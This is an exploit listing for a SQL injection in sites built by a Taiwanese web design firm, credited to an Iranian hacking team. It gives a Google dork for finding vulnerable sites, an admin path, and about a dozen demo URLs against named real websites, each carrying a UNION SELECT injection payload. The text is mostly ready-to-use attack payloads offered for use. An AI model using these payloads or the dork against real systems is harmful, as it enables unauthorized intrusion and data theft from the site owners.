######################
# Exploit Title : SIRIUS 網頁設計 SQL Injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.sirius-design.com.tw/
# Google Dork : intext:"SIRIUS 網頁設計" inurl:news.php?gid=
# Date: 17.12.2015
# Tested On : Win 10 / Google Chrome
#
######################
# adminpage= site.com/admin/
#
# demos :
# http://Xwww.hebiotech.com/news.php?guid=-42ad0a5d-2615-11e5-8669-00155d630c0b%22+union+select+1,2,version(),4,5,6,7,8--%20-
# http://pXinyang.com.tw/news.php?gid=-5405aeda-ddb3-11e4-8fa6-00148504426c%22+union+select+1,version(),3,4,5,6,7,8,9,10--%20-
# http://wwXw.monchhichi-club.com.tw/news.php?no=-82%27+union+select+1,2,version(),4,5--%20-
# http://wwwX.falamabiotech.com/en/news.php?gid=-934450a0-6330-1030-ac35-00148504426c%22+union+select+1,2,3,version(),5,6,7,8,9,10,11--%20-
# http://www.sXirius-design.com.tw/news.php?gid=-7bdba314-5322-11e5-abd8-c8917cb92aa8%27+union+select+1,2,version(),4,5,6,7,8--%20-
# http://www.gloXry-nano.com/en/news.php?gid=-ce6153dc-e704-11e4-936d-000fea5eb68b%27+union+select+1,2,3,version(),5,6,7,8,9,10--%20-
# http://www.tccpXf.org.tw/news.php?gid=-5ff65a6e-709d-11e5-aa20-aa00b0533d01%22+union+select+1,version(),3,4,5,6,7,8,9,10,11--%20-
# http://www.shanxXifang.com.tw/cn/news.php?gid=-bc484316-9de2-11e3-90c5-00148504426c%22+union+select+1,2,version(),4,5,6,7,8,9,10,11--%20-
# http://www.tt-tengXtai.com/news.php?gid=-0632d7fe-6d9c-11e5-a030-00148504426c%22+union+select+1,2,version(),4,5,6,7,8--%20-
# http://www.brake.coXm.tw/news.php?gid=-e2b349cc-a789-11e4-b524-00148504426c%22+union+select+1,2,version(),4,5--%20-
# http://www.da-shine.cXom.tw/news.php?yid=-2014%27+union+select+1,version(),3,4,5,6,7,8,9,10,11,12--%20-
# http://www.djm.com.twX/news.php?gid=-033c95ca-8c52-11e5-9f8d-9a89ddba0c0d%27+union+select+1,2,version(),4,5,6--%20-
# http://www.sungreeXntech.com.tw/news.php?gid=-14fef18c-9e2a-11e5-a030-00148504426c%22+union+select+1,2,version(),4,5,6,7,8--%20-
######################
# discovered by : modiret
######################